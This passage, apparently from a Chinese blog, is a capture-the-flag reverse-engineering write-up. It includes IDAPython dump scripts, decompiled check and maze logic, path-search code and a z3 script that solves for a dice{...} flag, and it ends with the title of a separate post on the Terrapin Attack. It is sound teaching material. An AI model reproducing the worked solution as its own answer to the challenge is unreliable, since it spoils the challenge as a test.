        slot_cnt = idaapi.get_qword(current_address + 0x18)
        exec_type = idaapi.get_qword(current_address + 0x20)
        value_type = idaapi.get_qword(current_address + 0x28)
        value_or_ptr = idaapi.get_qword(current_address + 0x30)
        var_length = idaapi.get_qword(current_address + 0x38)
        # router_name = idaapi.get_dword(current_address + 12)
        
        if cnt > 0x149d:
            break
        # if length == 0:
        #     break
        struct = {
            'current_addr':current_address,
            'line': line,
            'argc': argc,
            'slot_cnt':slot_cnt,
            'exec_type':exec_type,
            'value_type':value_type,
            'value_or_ptr':value_or_ptr,
            'var_length':var_length
            # 'router_name': router_name
        }
        struct_array.append(struct)

        # 更新当前地址
        current_address += 0x40

    return struct_array

def parse_edge(start_address):
    struct_array = []
    current_address = start_address
    cnt = 0

    next_edge = current_address
    while True:
        cnt += 1
        # addr = current_address
        current_address = next_edge
        if current_address == 0:
            break
        next_edge = idaapi.get_qword(current_address)
        dst = idaapi.get_qword(current_address + 8)
        src = idaapi.get_qword(current_address + 0x10)
        #router_name = idaapi.get_dword(current_address + 12)
        # if length == 0:
        #     break
        struct = {
            'current_adddr': current_address,
            'next_edge':next_edge,
            'dst': dst,
            'src': src,
        }
        struct_array.append(struct)

        # current_address += 0x20

    return struct_array



def dump_router(insts,edges):

    lines_arg = []
    for i in range(0x149d):
        lines_arg.append([])
    
    for each_edge in edges:
        # print(each_edge['src'])
        lines_arg[each_edge['src']].insert(0,each_edge['dst'])

    output = ""
    map_func = 0x559c80cd3660
    # mappings
    map_line = [[0 for i in range(0x80)] for i in range(0x80)]

    for each_inst in insts:
        outputline = "[0x%x]Block[0x%x]:\n"%(each_inst['current_addr'],each_inst['line'])
        output += outputline
        outputline = "call_type:%x\n"%each_inst['exec_type']
        output += outputline
        outputline = "argc:%d\n"%each_inst['argc']
        output += outputline
        idx = 0
        args = []
        for each_arg in each_inst['argv']:
            outputline = ""
            if each_arg['value_type'] == 2:
                outputline += "argv[%d]:0x%x"%(idx, each_arg['value_or_ptr'])
                args.append(each_arg['value_or_ptr'])
            else:
                length = each_arg['var_length']
                value = idaapi.get_bytes(each_arg['value_or_ptr'], length)
                if length > 0x30:
                    value = func_map.get(value,value)
                outputline += "argv[%d]:%s"%(idx, value)
                args.append(value)

            # print("now the line is " + str(each_inst['line']))
            outputline += " ->" + hex(lines_arg[each_inst['line']][idx])
            idx += 1

            outputline += "\n"
            output += outputline

        # check and mapping
        if len(args) == 5 and args[0] == map_func:
            print("emter")
            if args[2] == 0xa or args[2] == 0xb:
                print("(0x%x,0x%x)"%(args[3],args[4]))
                map_line[args[3]][args[4]] = -1


    fd = open("block_maps.dump",'w')
    for eachline in map_line:
        fd.write(str(eachline))
        fd.write(",\n")
    fd.close()




    fd = open('block_run.dump','w')
    # just check content type == 1
    fd.write(output)
    fd.close()


def main():
    # blocks = parse_Block(0x561F80D6F2C0)
    edge = parse_edge(0x0559C8057D080)
    start_address = 0x7f4477c18010 
    blocks = parse_route(start_address)
    output = ''
    for each_inst in edge:
        for each_item in each_inst:
            outputline = "%s:0x%x"%(each_item, each_inst[each_item]) 
            # print(outputline,end=',')
            output += outputline + ','
        output += '\n'
        # print("")
    fd = open('edge.dump','w')
    # just check content type == 1
    fd.write(output)
    fd.close()

    dump_router(blocks,edge)

    # fd = open('block.dump','w')
    # # just check content type == 1
    # fd.write(output)
    # fd.close()

main()

其中的函数表为我们单独在IDA中分析得到的结果。之后就能得到一个处理后的Block数据关系，由于多达0x149d个block，这里选取部分内容展示：

[0x7f01023890a0]Block[0x402]:
call_type:3
argc:0
[0x7f01023890e8]Block[0x403]:
call_type:3
argc:0
[0x7f0102389130]Block[0x404]:
call_type:4
argc:2
argv[0]:get_index_from_input ->0x1367
argv[1]:0x1 ->0x403
[0x7f0102389178]Block[0x405]:
call_type:4
argc:3
argv[0]:xor_all_argv ->0x1342
argv[1]:0x69 ->0x402
argv[2]:0x31 ->0x404
[0x7f01023891c0]Block[0x406]:
call_type:4
argc:2
argv[0]:check_if_zero ->0x1296
argv[1]:0x58 ->0x405

阶段二：flag有效性检查一

在Blocks在逆向过程中，会发现存在大量的重复逻辑：

[0x7f0102389208]Block[0x407]:
call_type:3
argc:0
[0x7f0102389250]Block[0x408]:
call_type:3
argc:0
[0x7f0102389298]Block[0x409]:
call_type:4
argc:2
argv[0]:get_index_from_input ->0x1367
argv[1]:0x2 ->0x408
[0x7f01023892e0]Block[0x40a]:
call_type:4
argc:3
argv[0]:xor_all_argv ->0x1342
argv[1]:0x63 ->0x407
argv[2]:0x32 ->0x409
[0x7f0102389328]Block[0x40b]:
call_type:4
argc:2
argv[0]:check_if_zero ->0x1296
argv[1]:0x51 ->0x40a

例如上面这段0x407~0x40b和上面贴出来的0x402~0x406非常类似。并且我们可以观察到，0x403获取的值为1，0x408获得的值为2。总结一下特点：

逻辑极为相似
存在固定值递增

几乎可以断定，即便是从不同的Block取出来的值，这些值应该是循环中使用的同一个变量中的递增值。于是经过分析，可以得出如下的逻辑：

int length = strlen(flag);
    // first check
    if(length != 0x26)
    {
        return;
    }

    // second check
    for(int j = 0; j < length-1; j++)
    {
        //?+j
        if((j+1) ^ length == 0)
        {
            res = flag[j] * 0x7 + res;
        }
        else
        {
            res =  res ^ j ^ flag[j] ^ (flag[j] * 0xe + flag[j+1]);
        }
    }
    
    if(res ^ 0x784 != 0)
    {
        return;
    }

可以看到，这些检测并不能确认一个具体的值，而是【将数值限制在了某个范围内】。所以后面的程序逻辑极有可能都是【限制数值的取值】。后面的逻辑逆向如下:

// third check
if(input[0] ^ 0x64 !=0)
{
    return;
}

// forth check
if(input[1] ^ 0x69 !=0)
{
    return;
}

if(input[2] ^ 0x63 !=0)
{
    return;
}

if(input[3] ^ 0x65 !=0)
{
    return;
}

if(input[4] ^ 0x7b !=0)
{
    return;
}

if(input[0x25] ^ 0x7d !=0)
{
    return;
}

//fiith check
int res = 0;
for(int i = 0; i < 0x20; i++)
{
    if(j&(1))
    {
        res = reorder_s2[i&0xf] * 0xee + res;
    }
    else
    {
        res = reorder_s2[i&0xf] * 0x1604b + res;
    }
}

if(0x369e9f5 ^ res !=0)
{
    return;
}

//sixth check
int res = 0;
for(int i = 0; i < 0x10; i++)
{
    if(j&(1))
    {
        res = reorder_s1[i&0xf] * 0xee + res;
    }
    else
    {
        res = reorder_s1[i&0xf] * 0x1604b + res;
    }
}

if(0x365c292 ^ res !=0)
{
    return;
}

// seventh check
if(!check_maps(flag))
{
    return;
}

根据前6个check，我么能够知道如下信息：

flag长度为0x26
flag为dice{XXXXXXXXXXXXXX}的形式
从中间开始，flag被打乱排序进行检测

然而如果我们仅用前六个逻辑，使用z3会计算出非常大量的答案，根本没办法确认哪个才是正确答案。在这六个逻辑后，还有最关键的第七个maze_step，也就是前面未提到的走迷宫函数。显然，需要配合迷宫才能完成最后的约束。

阶段三：迷宫绕路

在进入迷宫前，会将flag中间的数值（总共32字节）取出，并且打乱后重组。在逆向这个迷宫函数的时候，发现迷宫函数本身有点怪异。与其他CallFunc不同，迷宫函数本身非常大，功能也很多:

_QWORD *__fastcall maze_step(a)
{
  _DWORD *v56; // rax
  __int64 v57; // r8
  if ( argv0 )
  {
    if ( argv1 == 12 )        // 0xc -> sepcial_high_low_number
    {
      if ( *((_BYTE *)argv0 + 8) )
        v57 = 0LL;
      else
        v57 = (*argv0 << 16) | argv0[1];
      memset(a1, 0, 0x188uLL);
      *a1 = 1LL;
      *((_DWORD *)a1 + 2) = 2;
      a1[2] = v57;
    }
    else if ( argv1 == 10 || argv1 == 11 )
    {
      *((_BYTE *)&argv0[32 * argv2 + 2] + argv3 + 1) = -1;    //  10|11 -> update_argv0
      memset(a1, 0, 0x188uLL);
      *a1 = 1LL;
      *((_DWORD *)a1 + 2) = 2;
      a1[2] = argv0;
    }
    else
    {
      if ( !argv1 )                                            // 0 -> add_right_1_add_up_1
      {
        ++*argv0;
        ++argv0[1];
      }
      if ( argv1 == 1 )                                        // 1 -> add_right_1
        ++argv0[1];
      if ( argv1 == 2 )                                        // 2 -> add_right_1_sub_up_1
      {
        --*argv0;
        ++argv0[1];
      }
      if ( argv1 == 3 )                                        // 3 -> sub_up_1
        --*argv0;
      if ( argv1 == 4 )                                        // 4 -> add_up_1
        ++*argv0;
      if ( argv1 == 5 )                                        // 5 -> add_up_1_sub_right_1
      {
        ++*argv0;
        --argv0[1];
      }
      if ( argv1 == 6 )                                        // 6 -> sub_right_1
        --argv0[1];
      if ( argv1 == 7 )                                        // 7 -> sub_right_1_sub_up_1
      {
        --*argv0;
        --argv0[1];
      }
      if ( argv0[0x80 * (unsigned __int64)*argv0 + argv0[1] + 9 + 1] ) // if(real_map[map[0]][map[1]])
        *((_BYTE *)argv0 + 8) = 1;
      memset(a1, 0, 0x188uLL);
      *a1 = 1LL;
      *((_DWORD *)a1 + 2) = 2;
      a1[2] = argv0;
    }
  }
  else
  {
    v56 = (_DWORD *)a56_malloc(16396LL);
    *v56 = 64;
    v56[1] = 64;
    memset(a1, 0, 0x188uLL);
    *a1 = 1LL;
    *((_DWORD *)a1 + 2) = 2;
    a1[2] = v56;
  }
  return a1;
}

可以看到，当前函数中，既有创建地图的逻辑，又有初始化地图的逻辑，移动的逻辑，以及检查逻辑。

并且在此时，Block中出现了三个不同的数据表:

[0x7f4477c54160]Block[0xd5a]:
call_type:b
argc:3
argv[0]:b'\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x07\x04\x05\x02\x07\x05\x05\x05\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x07\x03\x08\x06\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x02\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x07\x07\x04\x06\x05\x06\x04\x02\x07\x07\x04\x05\x01\x04\x00\x07\x02\x03\x08\x01\x07\x06\x04\x05\x00\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07' ->0x149c
argv[1]:0x37 ->0xd57
argv[2]:0xdeadbeef ->0xd59
[0x7f4477c541a8]Block[0xd5b]:
call_type:3
argc:0
[0x7f4477c541f0]Block[0xd5c]:
call_type:4
argc:4
argv[0]:maze_step ->0x145d
argv[1]:0x559c80cd3660 ->0xd45
argv[2]:0x5 ->0xd5a
argv[3]:0x1 ->0xd5b
[0x7f4477c54238]Block[0xd5d]:
call_type:3
argc:0
[0x7f4477c54280]Block[0xd5e]:
call_type:b
argc:3
argv[0]:b'\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x07\x04\x07\x01\x07\x04\x05\x07\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x07\x03\x08\x04\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x01\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x05\x07\x04\x06\x05\x06\x06\x02\x07\x06\x05\x07\x01\x05\x00\x03\x02\x03\x08\x01\x07\x07\x04\x05\x04\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07' ->0x12d5
argv[1]:0x37 ->0xd57
argv[2]:0xdeadbeef ->0xd5d
[0x7f4477c542c8]Block[0xd5f]:
call_type:3
argc:0
[0x7f4477c54310]Block[0xd60]:
call_type:4
argc:4
argv[0]:maze_step ->0x145d
argv[1]:0x559c80cd3660 ->0xd5c
argv[2]:0x7 ->0xd5e
argv[3]:0x2 ->0xd5f
[0x7f4477c54358]Block[0xd61]:
call_type:3
argc:0
[0x7f4477c543a0]Block[0xd62]:
call_type:b
argc:3
argv[0]:b'\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x02\x06\x06\x02\x07\x05\x05\x07\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x03\x03\x08\x04\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x02\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x05\x07\x06\x06\x05\x05\x07\x02\x07\x04\x04\x06\x01\x07\x00\x07\x02\x03\x08\x01\x07\x06\x04\x05\x05\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07' ->0x1255
argv[1]:0x37 ->0xd57
argv[2]:0xdeadbeef ->0xd61
[0x7f4477c543e8]Block[0xd63]:
call_type:3
argc:0
[0x7f4477c54430]Block[0xd64]:
call_type:4
argc:4
argv[0]:maze_step ->0x145d
argv[1]:0x559c80cd3660 ->0xd60
argv[2]:0x7 ->0xd62
argv[3]:0x3 ->0xd63

结合程序逻辑，我们能够大胆猜测，这个函数的运行逻辑如下：

先尝试初始化maps
读取flag[i]，然后从三个不同的表steps1,steps2,steps3中取出对应的数字
根据数字，得到当前的maps的前进路径
最后检查的时候，获取当前的坐标

通过进一步分析maze函数和blocks，能够得知以下信息：

起点为(0x40,0x40)
终点为(0x45,0x8)
每个flag会强迫当前迷宫前进三步，这意味着这个迷宫必须要在96步中完成
每一步都不能碰到数字-1

一开始，我尝试过直接使用最短路径来计算如何前往目的地。毕竟大多数时候，这种逆向题目都会将最短路径作为唯一解。我尝试过使用BFS找最短路径，然而最后得到的路径居然只需要89步，而不是题目要求的96步。
简单分析了一下，我发现这个题目中，总共有9种前进模式。除了常见地上下左右，还能斜着前进，以及原地不动。于是我修改成上述地样子，指定必须在规定的步数内完成:


def find_path():
    stack = [start]
    visited = set()
    predecessor = {}  # 存储前驱节点

    paths = []
    while stack:
        x, y, cnt = stack.pop()
        # print(x,y,cnt)
        
        if (x, y, cnt) == end:
            # print(len(stack))
            # 找到了满足条件的路径，回溯获取完整路径
            path = [(x, y, 0)]
            c = cnt
            i = 0
            while (x, y, c) != start:
                # print(x,y,c,i)
                x, y, c, i = predecessor[(x, y, c)]
                # print(x,y,c,i)
                c -= 1
                path.append((x, y, i))
            path.reverse()
            paths.append(path)
            # return path
            continue

        if 0x60 < cnt:
            continue
        # if (x, y, cnt-1) not in visited:
        #     visited.add((x, y, cnt))
            
        # 检查上、下、左、右四个相邻位置
        for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1)]:
            new_x, new_y = x + dx, y + dy
            
            # print(new_x,new_y)
            # if (new_x, new_y) not in visited and is_valid(steps):
            if (new_x, new_y, cnt+1) not in visited and \
                new_x >=0 and new_y >= 0 and \
                new_x < 0x80 and new_y < 0x80 and \
                    mappings[new_x][new_y] == 0:
                # print(hex(new_x), hex(new_y))
                stack.insert(0,(new_x, new_y, cnt+1))
                i = stps_map[(dx, dy)]
                predecessor[(new_x, new_y, cnt+1)] = (x, y, cnt+1, i)  # 记录前驱节点
                visited.add((new_x, new_y, cnt+1))

    return paths  # 未找到满足条件的路径

然而我打印了路径后发现，算法得到的路径只是先原地打转，然后再直接使用最短路径前进如果答案真的这样做，那可能的情况也太多了。在朋友地提示下，我打印出了当前执行地地图，地图大致如下:

在这个地图片段的最下方，有一个像是L的地方。如果用算法的话，它总是会这样前进：

然而，根据一般逆向题的逻辑，这里的路径应该是要长成这个样：

再三纠结了以下，我尝试手动走这个迷宫，并且在拐角处尽可能地转弯而不是走斜线，发现正好在96步完成了迷宫。然而，正如我们前文提到的，我们的前进方向会受到前面三个表的限制，他这个前进模式如下:

char* steps[] = {step1, step2, step3};
for(int i=0; i< strlen(flag); i++)
{
  char c = flag[i];
  for(int j=0; j < 2; j++)
  {
    s = steps[j][c];
    update_map(s,walk);
  }
}

举个例子：当我们的c取值为0的时候，step1[0]的值为0，steps2[0]的值为0。在我们获得了正确前进路线的情况下，这里尝试一口气使用三个前进方向来反向限制当前的输入。根据这个逻辑，可以写出如下的代码:


steps1 = b"\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x07\x04\x05\x02\x07\x05\x05\x05\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x07\x03\x08\x06\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x02\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x07\x07\x04\x06\x05\x06\x04\x02\x07\x07\x04\x05\x01\x04\x00\x07\x02\x03\x08\x01\x07\x06\x04\x05\x00\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07"
steps2 = b"\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x07\x04\x07\x01\x07\x04\x05\x07\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x07\x03\x08\x04\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x01\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x05\x07\x04\x06\x05\x06\x06\x02\x07\x06\x05\x07\x01\x05\x00\x03\x02\x03\x08\x01\x07\x07\x04\x05\x04\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07"
steps3 = b"\x07\x06\x04\x06\x07\x00\x06\x05\x07\x02\x01\x06\x00\x01\x07\x07\x05\x06\x04\x08\x07\x08\x02\x01\x00\x01\x08\x08\x01\x00\x03\x03\x05\x04\x01\x08\x08\x02\x03\x05\x06\x01\x06\x07\x04\x01\x00\x04\x02\x06\x06\x02\x07\x05\x05\x07\x06\x04\x03\x07\x07\x07\x06\x00\x08\x08\x01\x01\x03\x03\x08\x04\x02\x08\x03\x06\x03\x00\x07\x00\x07\x05\x02\x06\x05\x06\x07\x02\x05\x07\x00\x07\x00\x08\x04\x05\x07\x06\x06\x05\x05\x07\x02\x07\x04\x04\x06\x01\x07\x00\x07\x02\x03\x08\x01\x07\x06\x04\x05\x05\x08\x03\x02\x03\x02\x04\x08\x08\x05\x00\x06\x05\x07\x06\x02\x07\x05\x08\x00\x08\x00\x00\x01\x06\x05\x06\x05\x00\x01\x07\x01\x06\x02\x02\x03\x05\x05\x01\x05\x04\x00\x05\x00\x01\x02\x06\x02\x00\x00\x05\x08\x02\x03\x01\x05\x03\x00\x01\x07\x04\x07\x03\x07\x07\x08\x08\x06\x00\x07\x00\x03\x08\x08\x01\x04\x08\x00\x04\x02\x07\x03\x06\x06\x00\x07\x04\x01\x03\x04\x05\x01\x03\x00\x04\x02\x02\x02\x08\x02\x07\x02\x08\x07\x02\x07\x00\x04\x06\x05\x01\x06\x02\x04\x01\x00\x03\x08\x04\x00\x06\x01\x01\x01\x06\x02\x08\x02\x01\x04\x02\x05\x03\x02\x02\x05\x07"

import string
step_idx = 0
while step_idx+2 < len(targets):
    for i in range(len(steps1)):
        if steps1[i] == targets[step_idx] and \
        steps2[i] == targets[step_idx+1] and \
        steps3[i] == targets[step_idx+2] and \
            chr(i) in string.printable:
            print("[%d]find it:%c[%d]"%(step_idx, chr(i),i))

    step_idx += 3

在代码中的targets即为一个由三个步子构成的前进方向方向。在脚本的配合下，走迷宫走到终点后能够得到一个这样的对应关系:

targets = [
    0,4,5, # w
    4,6,7, # e
    7,7,2, # 0
    7,7,3, # D
    2,1,2, # 3|R
    2,1,2, # 3|R
    7,7,2, # 0
    7,5,5, # _
    7,5,5, # _
    4,5,7, # l
    6,6,5, # d
    4,5,4, # i
    6,7,6, # t
    7,3,7, # n
    5,4,5, # 5
    5,5,5, # '| |6|Q|T|X|c|v
    5,7,7, # 7
    7,3,7, # n
    7,5,5, # _
    7,6,4, # h
    5,7,6, # 2|j
    5,5,5, # '| |6|Q|T|X|c|v
    7,3,7, # n
    5,7,6, # 2|j
    6,4,4, # G
    6,6,5, # d
    4,4,6, # 1|a
    7,3,7, # n
    5,7,6, # 2|j
    4,4,6, # 1|a
    4,5,4, # i
    4,4,6  # 1|a
    ]

可以看到，即使尝试利用路径限制，每一个flag的取值也不是固定的。最终，我们将这一个约束条件也加入，可以得出如下的解题脚本:


from z3 import *

BITS = 8
# target = 0x66de3c1bf87fdfcf

# Solver, which will help to get answer
solver = Solver()


flags = []

for i in range(0x20):
    each_flag = BitVec("flag%d"%i ,BITS)
    flags.append(each_flag)
    solver.add(each_flag <= 0x7f)
    solver.add(each_flag >= 0x10)

# [2, 6, 1, 15, 13, 12, 4, 7, 10, 0, 5, 8, 11
# , 14, 9, [3], 20, 23, 19, 25, 30, 
solver.add(flags[2] == ord('w'))
solver.add(flags[6] == ord('e'))
solver.add(flags[1] == ord('0'))
solver.add(flags[15] == ord('D'))
solver.add(Or(flags[13] == ord('3'),flags[13] == ord('R')))
solver.add(Or(flags[12] == ord('3'),flags[12] == ord('R')))
solver.add(flags[4] == ord('0'))
solver.add(flags[7] == ord('_'))
solver.add(flags[10] == ord('_'))
solver.add(flags[0] == ord('l'))
solver.add(flags[5] == ord('d'))
solver.add(flags[8] == ord('i'))
solver.add(flags[11] == ord('t'))
solver.add(flags[14] == ord('n'))
solver.add(flags[9] == ord('5'))
solver.add(Or(flags[3] == ord(' '),flags[3] == ord('\''),
              flags[3] == ord('6'),flags[3] == ord('Q'),
              flags[3] == ord('T'),flags[3] == ord('X'),
              flags[3] == ord('c'),flags[3] == ord('v'),))
solver.add(flags[20] == ord('7'))
solver.add(flags[23] == ord('n'))
solver.add(flags[19] == ord('_'))
solver.add(flags[25] == ord('h'))
solver.add(Or(flags[30] == ord('2'),flags[24] == ord('j')))
solver.add(Or(flags[24] == ord(' '),flags[24] == ord('\''),
              flags[24] == ord('6'),flags[24] == ord('Q'),
              flags[24] == ord('T'),flags[24] == ord('X'),
              flags[24] == ord('c'),flags[24] == ord('v'),))
# 24, 31, 28, 18, 26, 27, 17, 22, 29, 16, 21]
solver.add(flags[31] == ord('n'))
solver.add(Or(flags[28] == ord('2'),flags[28] == ord('j')))
solver.add(flags[18] == ord('G'))
solver.add(flags[26] == ord('d'))
solver.add(Or(flags[27] == ord('1'),flags[27] == ord('a')))
solver.add(flags[17] == ord('n'))
solver.add(Or(flags[22] == ord('2'),flags[22] == ord('j')))
solver.add(Or(flags[29] == ord('1'),flags[29] == ord('a')))
solver.add(flags[16] == ord('i'))
solver.add(Or(flags[21] == ord('1'),flags[21] == ord('a')))



flag_start = [0x64,0x69,0x63,0x65,0x7b]
flag_end = [0x7d]

total_flag = flag_start + flags + flag_end

res = 0
for i in range(len(total_flag)-1):
    res = res ^ i ^ total_flag[i] ^ (total_flag[i]*0xe+total_flag[i+1])

res = res + total_flag[len(total_flag)-1]*7

solver.add(res == 0x784)

t1 = [2, 6, 1, 15, 13, 12, 4, 7, 10, 0, 5, 8, 11, 14, 9, 3]
t2 = [0x04, 0x07, 0x03, 0x09, 0x0E, 0x08, 0x0F, 0x0C, 0x02, 0x0A, 0x0B, 0x01, 0x06, 0x0D, 0x00, 0x05]
flag_s1 = flags[:0x10]
flag_s2 = flags[0x10:]
remap_s1 = [flag_s1[i] for i in t1]
remap_s2 = [flag_s2[i] for i in t2]
reorg_t = t1
reorg_t += [i + 0x10 for i in t2]

res = 0
for i,each in enumerate(remap_s2):
    if i & 1:
        res = remap_s2[i&0xf] * 0xee + res
    else:
        res = remap_s2[i&0xf] * 0x1604b + res

# solver.add(res == 0x365c292)
solver.add(res == 0x369e9f5)
# 0x369e9f5

res = 0
for i,each in enumerate(remap_s1):
    if i & 1:
        res = remap_s1[i&0xf] * 0xee + res
    else:
        res = remap_s1[i&0xf] * 0x1604b + res

# solver.add(res == 0x369e9f5)
solver.add(res == 0x365c292)

# import string
# # try add mapping solver
# for each_c in flags:
#     for c in string.printable:


ans = []
# and calculate answer
while solver.check() == sat:
    model = solver.model()

    # print(model)
    ans.append(model)
    flag = ""
    for each_flag in flags:
        flag += chr(model[each_flag].as_long())
    print(flag)
    solver.add(Or([ model[v]!=v for v in flags]))

最终在这个约束下，能够求得唯一的flag。

总结

关于题目回顾
在看到官方给出的出题脚本之后，感觉依然没办法判断具体是哪种语言，感觉可能是一种叫做racket的编程语言。这种编程语言的思想其实很有意思，假设根据这种程序的编译结果来看，这些Block之间其实感觉是可以并发执行的。之前也和朋友讨论过，这种设计可能会导致cache命中出现问题，但是好像又增加了并发的可能。以后有空的话可以进一步学习这种有趣的编程语言

关于做题总结
这一次做题比上一次花了更长的时间。虽然一直都是做逆向出身，也做过逻辑特别复杂的题目，但是好像每次我都只能应付很小类型的题目。这次的题目其实回头看，当时挣扎的点都正好就是题目的难点：

是否应该把Block dump下来？还是考虑用angr符号执行来做
是否应该使用Edge将Block串联起来？这个过程会不会浪费很多时间？参数的顺序又是怎么样子的呢？
未初始化情况下Dump的Block似乎没有参考价值？是不是不应该这么做呢（后来想到了可以再最后阶段进行dump）
如此多的约束仍然求不出答案（当时没考虑maze的约束）是不是解题思路不对呢？
maze这么长的迷宫，果然还是应该用算法做吧，但是最短路径总是算的不对（最后直接使用手走迷宫）

每次迷茫的时候，其实心里都有正确答案，却一直在担心没有找到最优解而没有做下去。看起来比起pwn题，逆向更加需要比较坚定的信念和定力，也许确实更加考验做题人的精神力（笑）

Terrapin-Attack-学习2

2024-01-21T09:18:11.000Z

有了上篇的铺垫，这按开始正式的讲解Terrapin Attack

本文首发于破壳平台 https://mp.weixin.qq.com/s/axiHYAu54MdnMNKpJYGHbQ

Terrapin Attack

